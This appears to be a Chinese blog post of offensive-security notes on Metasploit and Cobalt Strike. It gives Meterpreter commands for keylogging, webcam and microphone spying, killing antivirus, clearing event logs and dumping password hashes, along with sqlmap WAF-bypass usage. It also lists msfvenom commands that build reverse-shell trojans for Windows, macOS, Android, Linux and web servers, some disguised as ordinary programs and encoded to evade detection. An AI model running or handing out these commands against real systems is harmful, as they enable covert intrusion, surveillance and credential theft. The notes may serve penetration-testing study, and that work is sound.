CS、MSF

MSF会话操作

基本功能

- ?
- help
- bg/background/^z

相关功能

ps 查看进程
getuid # 获取运行木马的用户
getpid # 获取进程号
migrate 7240 # 进程迁移
run vnc # 查看靶机的桌面
execute -f 路径 # 后台运行
kill 结束进程 kill 432

文件管理功能

lpwd # 获取攻击机当前工作目录
lls # 列攻击机当前目录内容
pwd # 获取肉鸡当前工作目录
ls # 列肉鸡当前目录内容
cd # windows下应该用双反斜杠间隔文件名,在遇到空格时应该使用引号
# c:\documents and Settings\administrator\桌面
# C:\Users\Anyone\Desktop
lcd # 切换攻击机本地目录
upload 上传文件
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\offsec
download 下载文件
download c:\\windows\\system32\\calc.exe /tmp/calc.exe
mkdir 创建文件夹
edit 编辑文件
mv 移动文件(前提是文件(夹)不存在)
cat 查看文件内容
rm 删除文件
rmdir 文件夹
show_mount # 查看挂载点
search -f ein.ini # 搜索文件

网络功能

arp 查看arp缓存表(IP地址和MAC地址的对照关系)
ifconfig/ipconfig 查看ip地址网卡
netstat 查看端口连接
getproxy # 获取代理

系统功能

ps 查看进程
reg 修改注册表
reboot 重启电脑
shell 获取shell
shutdown 关闭电脑
sysinfo 获取电脑信息
getsystem 获取高权限

其他功能

clearev # 清除日志
bgrun killav # 杀死杀病毒软件
bgrun vnc # 监控
enumdesktops 窗体列表(用户登录数)
keyscan_start 键盘记录-开始
keyscan_dump 键盘记录-下载
keyscan_stop 键盘记录-停止
uictl 获取键盘鼠标的控制权
uictl disable keyboard 锁定键盘
screenshot
record_mic 录制音频
webcam_chat 查看目标的摄像头
webcam_list 摄像头列表
webcam_stream 摄像头监控
hashdump 下载hash密文
route
getsystem: 提权、获取hash
load kiwi
creds_all

CS和MSF插件安装和使用

MSF插件的使用

load xxx
xxx
unload xxx

CS插件的使用

LSTAR为例

开启RDP服务方便远程连接

  • 获得一个beacon连接
  • 用插件开启RDP服务
  • 获得hash,到cmd5上查看对应密码
  • 物理机上输入mstsc,连接肉鸡

编写SQLMap绕WAF插件

改一个绕WAF的tamper脚本并另存,记住脚本文件名

把脚本放入到sqlmap的tamper目录下

运行sqlmap时添加tamper选项绕waf,例如

sqlmap -u "http://xxxx/?id=1" --tamper wide_byte --dbs

MSF多平台木马制作

新版本Kali用 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马。

回忆之前的木马

设立一个监听器

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost xxx.xxx.xx.xxx
msf6 > set lport 4444
msf6 > run -j

生成第一个木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -f
exe -o wps.exe

参数利用练习

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -x
/usr/share/windows-binaries/vncviewer.exe -e x86/shikata_ga_nai -i 5 -b
'\x00\x0a\xff' -f exe -o vncc.exe

各平台生成payload命令

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -e
x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o radmine-shikatanoadd.exe

Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp
LHOST=192.168.61.111 LPORT=4444 -f macho -o payload.macho

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -o
payload.apk

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp
LHOST=xxx.xxx.x.x LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o
payload.ps1

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.xxx LPORT=4567 -f elf -o payload.elf

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=8888 -f raw
> shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.x. LPORT=8888 -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x
LPORT=4567 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw - o
payload.war

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.js

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f
raw -o payload.py

perl

msfvenom -p cmd/unix/reverse_perl LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.rb

  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值